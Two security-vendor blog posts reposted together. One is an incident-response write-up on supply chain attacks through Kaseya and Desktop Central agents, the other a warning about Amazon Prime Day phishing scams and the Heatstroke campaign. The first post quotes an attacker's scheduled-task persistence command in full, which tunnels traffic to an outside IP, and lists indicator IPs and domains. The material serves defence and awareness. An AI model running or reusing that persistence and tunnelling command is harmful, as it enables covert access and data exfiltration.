Introduction

Modern technology has made managing large IT environments much less daunting compared to the past, when each endpoint had to be manually configured and maintained. Many organizations now use tools and IT solutions that allow centralized management of endpoints, making it possible to update, troubleshoot, and deploy applications from a remote location.

However, this convenience comes at a price — just as IT staff can access machines from a single location, the centralized nature of modern tech infrastructure also means that malicious actors can target the primary hub to gain access to the whole system.  Even more concerning, cybercriminals no longer even have to launch a direct attack against an organization — they can bypass security measures by focusing on their target’s supply chain. For example, instead of trying to find weak points in the system of a large organization that will likely have strong defenses, an attacker can instead target smaller companies that develop software for larger enterprises.

In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.

Incident #1: Attack on the Kaseya platform

On July 2, during the peak of the Kaseya ransomware incident, we alerted one of our customers, notifying them about  ransomware detections in their system.  

Our investigation found suspicious activity when the file AgentMon.exe, which is part of the Kaseya Agent, spawned another file, cmd.exe, that is responsible for creating the payload agent.exe, which in turn dropped MsMpEng.exe

By expanding our root cause analysis (RCA) and checking the argument for cmd.exe, we were able to see a few items before the execution of the ransomware. These initial set of indicators of compromise (IoCs) are similar to the ones discussed in another blog post.

We found that the malware attempted to disable the anti-malware and anti-ransomware features of Windows Defender via PowerShell commands. It also created a copy of the Windows command line program Certutil.exe to “C:\Windows\cert.exe”, which is used to decode the payload file agent.crt, with the output given the name agent.exe.  Agent.exe is then used to create the file MsMpEng.exe, a version of Windows Defender that is vulnerable to DLL side-loading.

Machine learning detection capabilities managed to block and detect the ransomware, however, the protection module was not activated in all the security agents of Trend Micro Apex One™ — so the organization’s support requested the team to check their product settings. Because the process chain showed that the ransomware came from a Kaseya agent, we  requested our customer to isolate the Kaseya servers to contain the threat.

A few hours later, Kaseya released a notice to their users to immediately shut down their Virtual System/Server Administrator (VSA) server until further notice.

Incident #2: Credential dumping attack on the Active Directory

The second supply chain incident handled by our MDR team starts with an alert to a customer that notified them of a credential dump occurring in their active directory (AD). The Incident View in Trend Micro Vision One™️ aggregated other detections into a single view, providing additional information on the scope of the threat. From there, we were able to see a server, an endpoint, and a user related to the threat.

Our threat hunting team also noted suspicious behavior related to WmiExec. Further investigation of the affected hosts’ Ownership Alignment Tools (OATs) show a related entry for persistence:

• C:\Windows\System32\schtasks.exe /CREATE /RU SYSTEM /SC HOURLY /TN “Windows Defender” /TR “powershell.exe C:\Windows\System.exe -L rtcp://0.0.0.0:1035/127.0.0.1:25 -F mwss://52.149.228.45:443” /ST 12:00

We found scheduled tasks being utilized as a persistence mechanism for the file System.exe. Further analysis of this file shows that it is related to GO simple tunnel, which is used to forward network traffic to an IP address depending on the argument.

Checking the initial alert revealed a file common in the two hosts, which prompted us to check the IOC list to determine the other affected hosts in the environment.

Expanding the nodes from the RCA allowed us to gather additional IOCs that showed setup0.exe creating the file elevateutils.exe. In addition, elevateutils.exe was seen querying the domain vmware[.]center, which is possibly the threat’s command-and-control (C&C) server. We also discovered the earliest instance of setup0.exe in one of the hosts.

The samples setup0.exe is an installer for elevateutils.exe which seems to be a Cobalt Strike Beacon Malleable C&C stager based on our analysis. The installer may have been used to masquerade as a normal file installation. 

The stager elevateutils.exe: will try to load the DLL chartdir60.dll, which will in turn read the contents of manual.pdf (these are also dropped by the installer in the same directory as elevateutil.exe). It will then decrypt, load, and execute a shell code in memory that will access the URL vmware[.]center/mV6c.

It makes use of VirtualAlloc, VirtualProtect, CreateThread, and a function to decrypt the shellcode to load and execute in memory. It also uses indirect API calls after decryption in a separate function, then uses JMP EAX to call the function as needed, which is not a routine or behavior that a normal file should have.

Since it’s possible that this is a Cobalt Strike Malleable C&C stager, further behaviors may be dependent on what is downloaded from the accessed URL. However, due to being inaccessible at the time of writing this blog post, we were unable to observe and/or verify other behaviors.

Use of the Progressive RCA of Vision One allowed us to see how elevateutils.exe was created, as well as its behaviors. The malicious file was deployed via a Desktop Central agent.

Based on these findings, our recommendation to the customer was to check the logon logs of the affected application to verify any suspicious usage of accounts during the time the threat was deployed.

By closely monitoring the environment, the threat was stopped after the credential dump. Furthermore, the IOCs (IP addresses and hashes) were added to the suspicious objects list to block them while waiting for detections. Further monitoring was done and no other suspicious behavior were seen.

Defending against supply chain attacks

As businesses become more interconnected, a successful supply chain attack has the potential to cause a significant amount of damage to affected organizations.  We can expect to see more of these in the future, as they often lead to the same results as a direct attack while providing a wider attack surface for malicious actors to exploit.

Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. For example, products and software may have configurations — such as folder exclusions and suboptimal implementation of detection modules — that make threats more difficult to notice.

Security audits are also a very important step in securing the supply chain.  Even if third party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.

Using Vision One to contain the threat

Trend Micro Vision One provides offers organizations the ability to detect and respond to threats across multiple security layers. It provides enterprises options to deal with threats such as the ones discussed in this blog entry:

• It can Isolate endpoints, which are often the source of infection, until they are fully cleaned or the investigation is done.
• It can block IOCs related to the threat, this includes hashes, IP addresses, or domains found during analysis.
• It can collect files for further investigation.

Indicators of Compromise (IoCs)

Incident # 1

Incident # 2

IP addresses and domains

• 185[.]215[.]113[.]213
• vmware[.]center
  
  Source :
  https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html

Malicious actors taking advantage of important events is not a new trend. For example, a large number of tax-related scams pops up every tax season in the US, with threats ranging from simple phishing emails to the use of scare tactics that lead to ransomware. More recently,  Covid-19 has led to a surge in pandemic-related malicious campaigns, mostly arriving via email.

For many people, major online shopping events such as the annual Amazon Prime day — which falls on June 21 this year — presents a unique opportunity to purchase goods at heavily discounted prices. However, shoppers are not the only ones looking to benefit — cybercriminals are also looking to prey on unsuspecting victims via social engineering and other kinds of scams. Amazon Prime has experienced tremendous growth over the past two years. According to estimates, there were 150 million Prime members at the end of the fourth quarter of 2019, a number which grew to 200 million by the first quarter of 2021 — with around 105 million users in the US alone. This makes Amazon Prime customers a particularly lucrative target for malicious actors.

As Amazon Prime day approaches, we’d like to build awareness among the shopping public by showing some of the related scams we’ve observed over the past few months.

Amazon Prime Scams

In 2020, Amazon Prime day, which is usually held in June or July, was postponed to October due to Covid-19. That same month, the Australian Communications and Media Authority (ACMA) issued an alert warning the public that they had been receiving reports of scammers — impersonating Amazon Prime staff — calling their targets, claiming that they owed money to Amazon. They also warned the victim that funds would be taken from their bank account if they did not act immediately. Often, the goal of these scammers is to retrieve Amazon account details and personal data from their victims by asking them to go online and enter the relevant information.

A variation of this scam involves swindlers calling their targets and presenting them with a recorded message, allegedly from Amazon, notifying call recipients of an issue with their order — such as a lost package or an unfulfilled order. The victims would then be invited to either press the number “1” button on their phone or provided a number that they would need to call. As with the first scam, the goals are the same: gaining personal information.

Aside from phone call scams, malicious actors also use tried-and-tested email-based phishing tactics. One method uses fake order invoices with corresponding phony order numbers and even a bogus hotline number, which, once called, will prompt the recipient to enter their personal details.

Another technique involves the scammer notifying an Amazon Prime user of problems with their account: For example, a Twitter post from user VZ NRW – Phishing shows fake Amazon Prime message warning the recipient that their Prime benefits have allegedly been suspended due to a problem with the payment. The message also contains a fake phishing link that the user would have to click to resolve the issue.  

hotline number. Note the suspicious email address used by the sender containing a misspelled “Amazon.”

Malicious actors will also make use of fake websites and online forms — many of which are painstakingly crafted to match the official sites as much as possible. One phishing website asks users to confirm payment details by filling out certain information. However, despite looking authentic, the page contains plenty of red flags — for example, none of the outbound links actually work, and the forms used in the page requests more data than usual, including personal information that companies typically never ask users to provide.

A precursory search in VirusTotal using the strings “Amazon” and “Prime” reveal over a hundred PDF files, many of which contain movie names (membership in Amazon Prime also makes users eligible for Prime Video). These PDF files are hosted on various cloud services, with the link to these files typically distributed via malicious emails.

Upon opening some of these files, a Captcha button appears, which will activate a malicious redirection chain when clicked.

While it’s easy to assume that most of these scammers are single individuals or small groups looking for a quick buck, there are certain threat actor groups that use sophisticated social engineering techniques for their campaigns, which includes Amazon users as a primary target.

The Heatstroke phishing campaign

We first encountered the phishing campaign known as Heatstroke back in 2019, noting that the group behind the campaign utilized complex techniques for both researching about and luring in their victims, which were primarily Amazon and Paypal users.

For example, compared to the webpage from the previous section, Heatstroke makes use of a phishing website with multiple working screens and subpages to try and mimic a legitimate website as much as possible. In addition, Heatstroke implements various obfuscation techniques such as forwarding the phishing kit content from another location or changing the landing page to bypass content filters.

The threat actor has implemented some improvements over the past two years — such as expanded IP ranges and improvements to user agents and the kit’s “self-defense” mechanisms (coverage of scams, anti-bot, and IP protection services), as well as the addition of an API and kill date, after which the kit won’t work anymore. 

Heatstroke remains active with a well-maintained infrastructure in 2021. The threat actor largely uses the same techniques from the past. However, it might be a case of not fixing what isn’t broken, given how effective the previous campaigns proved to be.

Defending against scams

As exciting as Amazon Prime Day (and other similar shopping extravaganzas like Black Friday and Cyber Monday) is, the public should remain vigilant against potential scams, as cybercriminals are looking to capitalize on these types of events.

The following best practices and recommendations can help individuals avoid these kinds of scams:

• Most reputable organizations will never ask for sensitive financial information over the phone. If a caller allegedly coming from Amazon or another company asks for strangely specific information such as credit card or bank account numbers, this is an automatic red flag.
• Be wary of out-of-context emails. If you receive an email referencing an item you did not purchase, then it is highly likely that the email is a phishing attempt. Refrain from downloading attachments or clicking links in suspicious emails, as these can lead to malware infections.
• Scan emails for typographical or grammatical mistakes. Legitimate emails will always be thoroughly checked and edited before being sent, therefore even small errors are possible signs of a malicious email.
• Always double check the URL of a website to see if it matches up with the real one. For example, Amazon websites and subpages will always have a dot before “amazon.com” (for example, “support.amazon.com” versus “support-amazon.com”), therefore, even if a website copies the design of the legitimate one, a sketchy URL will often give it away as being malicious. In the same vein, email addresses should be scrutinized to see if they look suspicious or have any unusual elements.
• Organizations are also encouraged to regularly check the awareness of employees on the latest cyberthreats via Trend Micro Phish Insight, a cloud-based security awareness service that is designed to empower employees to protect themselves and their organization from social engineering-based attacks.

Source :
https://www.trendmicro.com/en_us/research/21/f/amazon-prime-day-big-sales–big-scams.html